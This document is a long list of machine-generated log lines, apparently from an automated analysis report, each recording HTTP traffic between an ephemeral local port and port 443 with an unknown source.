            Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
            Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41814
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41810
            Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41938 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41800
            Source: unknownNetwork traffic detected: HTTP traffic on port 37022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41802
            Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40686 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39600 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37492 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34394 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36178 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35250 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41530 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38210
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
            Source: unknownNetwork traffic detected: HTTP traffic on port 38744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
            Source: unknownNetwork traffic detected: HTTP traffic on port 48186 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38216
            Source: unknownNetwork traffic detected: HTTP traffic on port 48558 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38206
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
            Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
            Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
            Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
            Source: unknownNetwork traffic detected: HTTP traffic on port 38360 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53860
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
            Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
            Source: unknownNetwork traffic detected: HTTP traffic on port 40204 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
            Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
            Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
            Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
            Source: unknownNetwork traffic detected: HTTP traffic on port 41902 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41832
            Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
            Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
            Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41826
            Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41820
            Source: unknownNetwork traffic detected: HTTP traffic on port 48174 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38252
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38254
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38256
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
            Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48150 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
            Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41898
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
            Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38244
            Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
            Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41884
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41880
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41882
            Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
            Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38230
            Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38234
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
            Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
            Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38228
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
            Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41872
            Source: unknownNetwork traffic detected: HTTP traffic on port 48546 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
            Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38220
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38222
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38224
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
            Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38218
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
            Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
            Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36538 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
            Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
            Source: unknownNetwork traffic detected: HTTP traffic on port 43302 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
            Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
            Source: unknownNetwork traffic detected: HTTP traffic on port 47642 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
            Source: unknownNetwork traffic detected: HTTP traffic on port 36514 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
            Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38162
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
            Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
            Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
            Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
            Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38152
            Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38154
            Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
            Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
            Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38140
            Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38142
            Source: unknownNetwork traffic detected: HTTP traffic on port 41086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
            Source: unknownNetwork traffic detected: HTTP traffic on port 33982 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38146
            Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
            Source: unknownNetwork traffic detected: HTTP traffic on port 49066 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
            Source: unknownNetwork traffic detected: HTTP traffic on port 46786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41788
            Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41784
            Source: unknownNetwork traffic detected: HTTP traffic on port 33524 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
            Source: unknownNetwork traffic detected: HTTP traffic on port 36960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53768
            Source: unknownNetwork traffic detected: HTTP traffic on port 47678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44160 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
            Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
            Source: unknownNetwork traffic detected: HTTP traffic on port 41074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43326 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37876 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
            Source: unknownNetwork traffic detected: HTTP traffic on port 43760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49054 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53774
            Source: unknownNetwork traffic detected: HTTP traffic on port 33536 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
            Source: unknownNetwork traffic detected: HTTP traffic on port 47666 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
            Source: unknownNetwork traffic detected: HTTP traffic on port 39264 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
            Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
            Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53780
            Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
            Source: unknownNetwork traffic detected: HTTP traffic on port 41062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38192
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38194
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38198
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53788
            Source: unknownNetwork traffic detected: HTTP traffic on port 37888 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53786
            Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
            Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51130
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33548 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38180
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38182
            Source: unknownNetwork traffic detected: HTTP traffic on port 54478 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38184
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38186
            Source: unknownNetwork traffic detected: HTTP traffic on port 36502 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
            Source: unknownNetwork traffic detected: HTTP traffic on port 52694 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
            Source: unknownNetwork traffic detected: HTTP traffic on port 46808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
            Source: unknownNetwork traffic detected: HTTP traffic on port 60614 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
            Source: unknownNetwork traffic detected: HTTP traffic on port 43772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34404 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34370 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37406 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51186
            Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51192
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51194
            Source: unknownNetwork traffic detected: HTTP traffic on port 39252 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51198
            Source: unknownNetwork traffic detected: HTTP traffic on port 47750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53574 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33512 -> 443
